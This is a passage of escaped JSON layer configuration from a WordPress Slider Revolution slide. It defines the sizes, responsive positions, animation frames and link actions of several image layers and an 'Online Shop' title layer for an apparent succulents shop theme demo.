From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Image 5\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-brown-31.png\",\"imageId\":4600},\"size\":{\"width\":{\"d\":{\"v\":\"453px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"304px\"},\"m\":{\"v\":\"238px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"480px\",\"e\":true},\"n\":{\"v\":\"322px\",\"e\":true},\"t\":{\"v\":\"322px\"},\"m\":{\"v\":\"252px\",\"e\":true}},\"originalWidth\":453,\"originalHeight\":480,\"aspectRatio\":{\"d\":{\"v\":0.94375},\"n\":{\"v\":0.94375},\"t\":{\"v\":0.94375},\"m\":{\"v\":0.94375}}},\"position\":{\"x\":{\"d\":{\"v\":\"511px\",\"e\":true},\"n\":{\"v\":\"492px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"-7px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"322px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"-84px\",\"e\":true},\"m\":{\"v\":\"-41px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Image 6\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-brown-21.jpg\",\"imageId\":4601},\"size\":{\"width\":{\"d\":{\"v\":\"678px\",\"e\":true},\"n\":{\"v\":\"553px\",\"e\":true},\"t\":{\"v\":\"451px\",\"e\":true},\"m\":{\"v\":\"294px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"433px\",\"e\":true},\"n\":{\"v\":\"353px\",\"e\":true},\"t\":{\"v\":\"288px\",\"e\":true},\"m\":{\"v\":\"187px\",\"e\":true}},\"originalWidth\":678,\"originalHeight\":433,\"aspectRatio\":{\"d\":{\"v\":1.5658198614318706},\"n\":{\"v\":1.5658198614318706},\"t\":{\"v\":1.5658198614318706},\"m\":{\"v\":1.5658198614318706}}},\"position\":{\"x\":{\"d\":{\"v\":\"147px\",\"e\":true},\"n\":{\"v\":\"147px\",\"e\":true},\"t\":{\"v\":\"103px\",\"e\":true},\"m\":{\"v\":\"17px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"101px\",\"e\":true},\"n\":{\"v\":\"106px\",\"e\":true},\"t\":{\"v\":\"159px\",\"e\":true},\"m\":{\"v\":\"112px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/shop-list\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 7\",\"alias\":\"Image 7\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/sh-single-landing1.png\",\"imageId\":4602},\"size\":{\"width\":{\"d\":{\"v\":\"691px\",\"e\":true},\"n\":{\"v\":\"603px\",\"e\":true},\"t\":{\"v\":\"513px\",\"e\":true},\"m\":{\"v\":\"310px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"407px\",\"e\":true},\"n\":{\"v\":\"355px\",\"e\":true},\"t\":{\"v\":\"302px\",\"e\":true},\"m\":{\"v\":\"183px\",\"e\":true}},\"originalWidth\":717,\"originalHeight\":432,\"aspectRatio\":{\"d\":{\"v\":1.6597222222222223},\"n\":{\"v\":1.6597222222222223},\"t\":{\"v\":1.6597222222222223},\"m\":{\"v\":1.6597222222222223}}},\"position\":{\"x\":{\"d\":{\"v\":\"-178px\",\"e\":true},\"n\":{\"v\":\"-150px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"v\":\"-13px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"-6px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/product\\/aero-aromathic\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Online Shop\",\"alias\":\"Title\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"v\":\"4px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-266px\",\"e\":true},\"n\":{\"v\":\"-225px\",\"e\":true},\"t\":{\"v\":\"200px\",\"e\":true},\"m\":{\"v\":\"83px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 